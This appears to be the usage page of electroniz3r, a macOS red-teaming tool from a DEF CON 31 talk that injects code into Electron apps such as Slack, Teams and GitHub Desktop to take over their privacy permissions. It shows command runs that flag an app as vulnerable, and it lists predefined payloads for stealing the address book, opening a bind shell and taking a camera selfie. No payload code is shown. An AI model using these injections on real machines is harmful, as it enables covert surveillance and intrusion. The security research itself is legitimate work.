Take over macOS Electron apps' TCC permissions with electroniz3r. The tool has been presented for the first time on DEFCON31 in Las Vegas during my ELECTRONizing macOS privacy - a new weapon in your red teaming armory
$ electroniz3r
OVERVIEW: macOS Red Teaming tool that allows code injection in Electron apps
by Wojciech Reguła (@_r3ggi)
USAGE: electroniz3r <subcommand>
-h, --help Show help information.
list-apps List all installed Electron apps
inject Inject code to a vulnerable Electron app
verify Verify if an Electron app is vulnerable to code injection
See 'electroniz3r help <subcommand>' for detailed help.
$ electroniz3r list-apps
║ Bundle identifier │ Path ║
com.microsoft.VSCode /Applications/Visual Studio Code.app
com.vmware.fusionApplicationsMenu /Applications/VMware Fusion.app/Contents/Library/VMware Fusion Applications Menu.app
notion.id /Applications/Notion.app
com.github.GitHubClient /Applications/GitHub Desktop.app
com.logi.optionsplus /Applications/logioptionsplus.app
com.microsoft.teams /Applications/Microsoft Teams.app
com.tinyspeck.slackmacgap /Applications/Slack.app
$ electroniz3r verify "/Applications/GitHub Desktop.app"
/Applications/GitHub Desktop.app started the debug WebSocket server
The application is vulnerable!
You can now kill the app using `kill -9 7033`
$ electroniz3r help inject
OVERVIEW: Inject code to a vulnerable Electron app
USAGE: electroniz3r inject <path> [--path-js <path-js>] [--predefined-script <predefined-script>]
<path> Path to the Electron app
--path-js <path-js> Path to a file containing JavaScript code to be executed
--predefined-script <predefined-script>
Use predefined JS scripts (calc, screenshot, stealAddressBook, bindShell, takeSelfie)
-h, --help Show help information.